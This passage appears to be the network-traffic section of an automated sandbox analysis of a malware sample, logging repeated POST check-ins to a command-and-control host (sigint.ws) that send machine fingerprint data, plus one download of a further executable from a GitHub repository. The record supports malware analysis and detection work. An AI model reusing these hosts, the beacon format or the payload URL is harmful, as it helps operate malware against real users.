                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:33.174819946 CEST | 3453 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              61 | 192.168.2.4 | 49835 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:33.554230928 CEST | 3453 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:33.734493971 CEST | 3454 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              62 | 192.168.2.4 | 49836 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:34.112032890 CEST | 3454 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:34.293441057 CEST | 3455 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              63 | 192.168.2.4 | 49837 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:34.756139994 CEST | 3455 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:34.938349962 CEST | 3456 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              64 | 192.168.2.4 | 49838 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:35.308939934 CEST | 3456 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:35.491517067 CEST | 3457 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              65 | 192.168.2.4 | 49839 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:35.815421104 CEST | 3457 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:36.000215054 CEST | 3457 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              66 | 192.168.2.4 | 49840 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:36.304157019 CEST | 3458 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:36.486763000 CEST | 3458 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              67 | 192.168.2.4 | 49841 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:36.841593981 CEST | 3459 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:37.025984049 CEST | 3459 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              68 | 192.168.2.4 | 49842 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:37.470331907 CEST | 3460 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:37.654067039 CEST | 3460 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              69 | 192.168.2.4 | 49843 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:37.930779934 CEST | 3461 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:38.112637997 CEST | 3461 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              7 | 192.168.2.4 | 49765 | 140.82.121.3 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:53:41.050184965 CEST | 1548 | OUT | GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1
                                                                              Host: github.com
                                                                              Jun 2, 2022 01:53:41.067187071 CEST | 1548 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Content-Length: 0
                                                                              Location: https://github.com/neiqops/ajajaj/raw/main/file_22613.exe


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              70 | 192.168.2.4 | 49844 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:38.495305061 CEST | 3462 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:38.679277897 CEST | 3462 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              71 | 192.168.2.4 | 49845 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:39.016304970 CEST | 3463 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:39.200731039 CEST | 3463 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              72 | 192.168.2.4 | 49846 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:39.535861969 CEST | 3464 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:39.718588114 CEST | 3464 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              73 | 192.168.2.4 | 49847 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:40.420239925 CEST | 3465 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:40.603180885 CEST | 3465 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              74 | 192.168.2.4 | 49848 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:40.940109968 CEST | 3466 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:41.123086929 CEST | 3466 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              75 | 192.168.2.4 | 49849 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:41.432431936 CEST | 3466 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:41.611175060 CEST | 3467 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              76 | 192.168.2.4 | 49850 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:42.196474075 CEST | 3467 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:42.380084991 CEST | 3468 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              77 | 192.168.2.4 | 49851 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:43.268559933 CEST | 3468 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:43.447304010 CEST | 3469 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              78 | 192.168.2.4 | 49852 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:46.408171892 CEST | 3469 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:46.592335939 CEST | 3470 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              79 | 192.168.2.4 | 49853 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:46.902584076 CEST | 3470 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:47.082290888 CEST | 3470 | IN | HTTP/1.1 200 OK
